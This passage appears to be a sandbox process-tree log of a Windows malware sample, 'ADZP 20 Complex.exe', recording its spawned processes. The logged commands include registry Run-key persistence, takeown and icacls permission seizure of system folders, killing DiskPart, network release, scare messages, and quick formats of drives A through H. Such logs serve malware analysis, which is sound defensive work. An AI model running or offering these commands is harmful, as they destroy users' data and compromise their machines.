C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:18020

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:8972

C:\Windows\system32\calc.exe
calc
7⤵
PID:9076

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:9108

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:9124

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9000

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:5536

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5272

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:10004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:10552

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:11280

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:3380

C:\Windows\system32\calc.exe
calc
5⤵
PID:3396

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:3412

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3420

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3428

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\600A.tmp\600B.tmp\600C.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:4484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5064

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:4840

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6252

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:4880

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:4760

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:4808

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:6960

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:7116

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:2832

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:2424

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:6456

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:944

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:1968

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:7744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:5260

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5524

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:5452

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:5436

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:2908

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:8100

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:6512

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CA42.tmp\CA43.tmp\CA53.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:12628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:16112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
9⤵
PID:16968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
9⤵
PID:17400

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:12552

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:17764

C:\Windows\system32\ipconfig.exe
ipconfig /release
9⤵
- Gathers network information
PID:18056

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:7896

C:\Windows\system32\calc.exe
calc
7⤵
PID:6468

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:6588

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:4336

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:5112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C091.tmp\C092.tmp\C093.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:10500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:15924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:16004

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
9⤵
PID:16764

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
9⤵
PID:17112

C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:17360

C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:18040

C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
9⤵
- Gathers network information
PID:16212

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:4976

C:\Windows\system32\calc.exe
calc
7⤵
PID:6328

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:5812

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:8028

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BFA7.tmp\BFA8.tmp\BFB9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:15356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:15724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:15948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
9⤵
PID:17316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
9⤵
PID:16652

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:980

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:18356

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:8116

C:\Windows\system32\calc.exe
calc
7⤵
PID:6344

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:6216

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:5560

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:8300

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9028

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:4432

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9796

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:9896

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:3452

C:\Windows\system32\calc.exe
calc
5⤵
PID:3468

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:3476

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3484

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3572

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\63D2.tmp\63D3.tmp\63D4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:4312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:5012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:4996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:5048

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6352

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:3968

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:4688

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:4564

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
PID:4756

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:7004

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:4740

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:6984

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:1600

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:3540

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5140

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:7856

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5284

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:5568

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:7292

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8032

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:5444

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:5220

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:8152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E550.tmp\E551.tmp\E552.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:16124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:16376

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:15484

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
9⤵
PID:12396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
9⤵
PID:1560

C:\Windows\SysWOW64\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:16348

C:\Windows\SysWOW64\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:18372

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:5220

C:\Windows\system32\calc.exe
calc
7⤵
PID:8140

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:6188

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:7432

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EC62.tmp\EC63.tmp\EC64.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:16268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:11104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:15604

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
9⤵
PID:17748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
9⤵
PID:18152

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:18256

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:7992

C:\Windows\system32\calc.exe
calc
7⤵
PID:2444

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:7732

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:7308

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:3056

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F392.tmp\F393.tmp\F394.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:15588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:16036

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
9⤵
PID:17892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
9⤵
PID:18088

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:18200

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:5892

C:\Windows\system32\calc.exe
calc
7⤵
PID:6340

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:8128

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:8196

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:8688

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8284

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5340

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8068

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:9484

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:6648

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:3592

C:\Windows\system32\calc.exe
calc
5⤵
PID:3612

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:3620

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:3632

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3888

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:3972

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3104

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:4048

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:9612

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:9596

C:\Windows\system32\calc.exe
calc
5⤵
PID:9324

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:9736

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:9828

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:10404

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10476

C:\Windows\system32\calc.exe
calc
5⤵
PID:10644

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:10808

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:10828

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:10876

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10912

C:\Windows\system32\calc.exe
calc
5⤵
PID:10948

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11028

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11064

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:11116

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11148

C:\Windows\system32\calc.exe
calc
5⤵
PID:11188

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:10376

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:10420

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:10560

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10780

C:\Windows\system32\calc.exe
calc
5⤵
PID:11240

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:10452

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:10516

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:10228

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:10740

C:\Windows\system32\calc.exe
calc
5⤵
PID:9584

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:7784

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11228

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:12068

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12228

C:\Windows\system32\calc.exe
calc
5⤵
PID:6908

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11388

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11552

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:10592

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11696

C:\Windows\system32\calc.exe
calc
5⤵
PID:11796

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11896

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12132

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:6012

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11332

C:\Windows\system32\calc.exe
calc
5⤵
PID:11300

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:11484

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:11520

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:10300

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:11584

C:\Windows\system32\calc.exe
calc
5⤵
PID:5092

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:6772

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:6584

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:11724

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12292

C:\Windows\system32\calc.exe
calc
5⤵
PID:12424

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:12448

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:12596

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
PID:12632

C:\Windows\system32\notepad.exe
notepad
5⤵
PID:12780

C:\Windows\system32\calc.exe
calc
5⤵
PID:12900

C:\Windows\explorer.exe
explorer.exe
5⤵
PID:12944

C:\Windows\system32\mspaint.exe
mspaint.exe
5⤵
PID:13048

C:\Windows\system32\icacls.exe
icacls "C:\Program Files"
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:13164

C:\Windows\system32\attrib.exe
attrib -r -a -s -h "C:\Program Files"
5⤵
- Views/modifies file attributes
PID:8212

C:\Windows\system32\format.com
format /y /q A:
5⤵
PID:13536

C:\Windows\system32\format.com
format /y /q B:
5⤵
PID:15272

C:\Windows\system32\format.com
format /y /q D:
5⤵
PID:15828

C:\Windows\system32\format.com
format /y /q E:
5⤵
PID:11648

C:\Windows\system32\format.com
format /y /q F:
5⤵
PID:13296

C:\Windows\system32\format.com
format /y /q G:
5⤵
PID:17280

C:\Windows\system32\format.com
format /y /q H:
5⤵
PID:18424

C:\Windows\system32\notepad.exe
notepad
3⤵
PID:2616

C:\Windows\system32\calc.exe
calc
3⤵
PID:2784

C:\Windows\explorer.exe
explorer.exe
3⤵
PID:2740

C:\Windows\system32\mspaint.exe
mspaint.exe
3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1800

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1876

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2DD4.tmp\2DD5.tmp\2DD6.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:1172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:1052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:2432

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:2056

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:2956

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:1160

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1060

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:1424

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
